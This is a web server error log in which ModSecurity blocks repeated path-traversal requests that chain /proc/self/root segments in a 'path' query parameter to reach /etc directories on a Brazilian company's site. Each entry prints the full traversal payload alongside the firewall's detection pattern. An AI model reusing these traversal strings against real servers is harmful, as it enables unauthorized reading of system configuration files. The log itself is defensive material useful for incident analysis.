[Mon Mar 16 13:32:55.996138 2026] [:error] [pid 10831:tid 140411666392832] [client 74.7.243.203:58754] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgwt46lpbStxTqkSktwbwAAAkk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:32:57.318331 2026] [:error] [pid 10651:tid 140411590858496] [client 74.7.243.203:58768] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgwubysWC90G-1nBrBIrQAAAZI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:32:58.427359 2026] [:error] [pid 10651:tid 140411658000128] [client 74.7.243.203:58770] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgwurysWC90G-1nBrBIrwAAAYo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:32:59.742092 2026] [:error] [pid 10831:tid 140411641214720] [client 74.7.243.203:58774] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgwu46lpbStxTqkSktwcAAAAkw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:33:02.024191 2026] [:error] [pid 10831:tid 140411699963648] [client 74.7.243.203:33366] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgwvo6lpbStxTqkSktwcgAAAkU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:33:03.619936 2026] [:error] [pid 15568:tid 140411624429312] [client 74.7.243.203:33378] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgwv6QpVkWug9HeOt86GwAAA04"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:33:04.974949 2026] [:error] [pid 15568:tid 140411632822016] [client 74.7.243.203:33380] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgwwKQpVkWug9HeOt86HQAAA00"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:33:06.310905 2026] [:error] [pid 14895:tid 140411599251200] [client 74.7.243.203:33396] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgwwlajLEzk2WiQ-10WhQAAApE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:33:08.470876 2026] [:error] [pid 11972:tid 140411632822016] [client 74.7.243.203:33410] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgww5qj1wV0Si-OkefzOAAAAA0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:33:16.384710 2026] [:error] [pid 15568:tid 140411725141760] [client 74.7.243.203:33426] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgwzKQpVkWug9HeOt86JwAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:33:17.745057 2026] [:error] [pid 21805:tid 140411733534464] [client 74.7.243.203:36670] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgwzbABkC4fWIHEf8HwggAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:33:27.837079 2026] [:error] [pid 10651:tid 140411565680384] [client 74.7.243.203:36672] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgw1rysWC90G-1nBrBI0AAAAZU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:34:00.639720 2026] [:error] [pid 10831:tid 140411683178240] [client 74.7.243.203:43948] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgw-I6lpbStxTqkSktwkgAAAkc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:34:13.838817 2026] [:error] [pid 21806:tid 140411683178240] [client 74.7.244.31:46052] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgxBdSswJuvopo3lOhjugAAAIc"]
[Mon Mar 16 13:34:54.123387 2026] [:error] [pid 10772:tid 140411599251200] [client 74.7.243.203:41662] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgxLv9ocpUE4ed4uDz0DgAAAhE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:34:56.537605 2026] [:error] [pid 21805:tid 140411540502272] [client 74.7.243.203:36558] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgxMLABkC4fWIHEf8HwoAAAAFg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:34:57.938372 2026] [:error] [pid 21805:tid 140411741927168] [client 74.7.243.203:36570] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgxMbABkC4fWIHEf8HwoQAAAEA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:34:59.262358 2026] [:error] [pid 15568:tid 140411699963648] [client 74.7.243.203:36586] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgxM6QpVkWug9HeOt86VwAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:35:03.631530 2026] [:error] [pid 15568:tid 140411716749056] [client 74.7.243.203:51494] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgxN6QpVkWug9HeOt86XQAAA0M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:36:18.937887 2026] [:error] [pid 11972:tid 140411699963648] [client 74.7.241.46:44554] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgxgpqj1wV0Si-OkefzxQAAAAU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 13:36:20.239440 2026] [:error] [pid 10831:tid 140411607643904] [client 74.7.241.46:39112] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgxhI6lpbStxTqkSktwngAAAlA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:36:23.609320 2026] [:error] [pid 11972:tid 140411632822016] [client 74.7.241.46:39126] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgxh5qj1wV0Si-OkefzzQAAAA0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 13:36:26.139819 2026] [:error] [pid 21533:tid 140411716749056] [client 74.7.241.46:39136] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgxinjZBu2q05ozVU9c1QAAAUM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
